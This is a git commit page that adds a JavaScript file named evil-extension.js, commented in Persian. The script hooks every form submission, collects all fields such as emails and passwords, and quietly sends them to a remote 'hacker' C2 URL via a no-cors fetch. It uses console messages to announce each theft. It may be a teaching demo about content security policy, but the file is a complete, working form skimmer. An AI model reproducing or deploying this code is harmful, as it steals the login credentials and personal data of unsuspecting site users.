Add
This commit is contained in:
parent
fc301181ca
commit
84105a211a
29
public/evil-extension.js
Normal file
29
public/evil-extension.js
Normal file
|
|
@ -0,0 +1,29 @@
|
|||
console.log("👿 افزونه مخرب با موفقیت لود شد!");
|
||||
|
||||
// شنود تمام فرمهایی که سابمیت میشوند
|
||||
document.addEventListener('submit', function(e) {
|
||||
let stolenData = {};
|
||||
let formData = new FormData(e.target);
|
||||
|
||||
// استخراج تمام فیلدهای فرم (ایمیل، پسورد و ...)
|
||||
for (let [key, value] of formData.entries()) {
|
||||
if (key !== '_token') { // توکن CSRF را لاگ نمیکنیم تا خروجی تمیزتر باشد
|
||||
stolenData[key] = value;
|
||||
}
|
||||
}
|
||||
|
||||
console.log("🕵️ در حال سرقت اطلاعات: ", stolenData);
|
||||
|
||||
// آدرس سرور هکر (C2)
|
||||
let hackerUrl = 'http://hackerapp.eitebar.ir/stealer?data=' + encodeURIComponent(JSON.stringify(stolenData));
|
||||
|
||||
// ارسال مخفیانه اطلاعات بدون متوقف کردن روند عادی فرم
|
||||
fetch(hackerUrl, {
|
||||
method: 'GET',
|
||||
mode: 'no-cors' // برای دور زدن خطاهای CORS در مرورگر
|
||||
}).then(() => {
|
||||
console.log("✅ اطلاعات با موفقیت به سرور هکر ارسال شد!");
|
||||
}).catch(err => {
|
||||
console.error("❌ مرورگر جلوی ارسال اطلاعات را گرفت (احتمالاً به دلیل CSP):", err);
|
||||
});
|
||||
});
|
||||
Loading…
Reference in New Issue
Block a user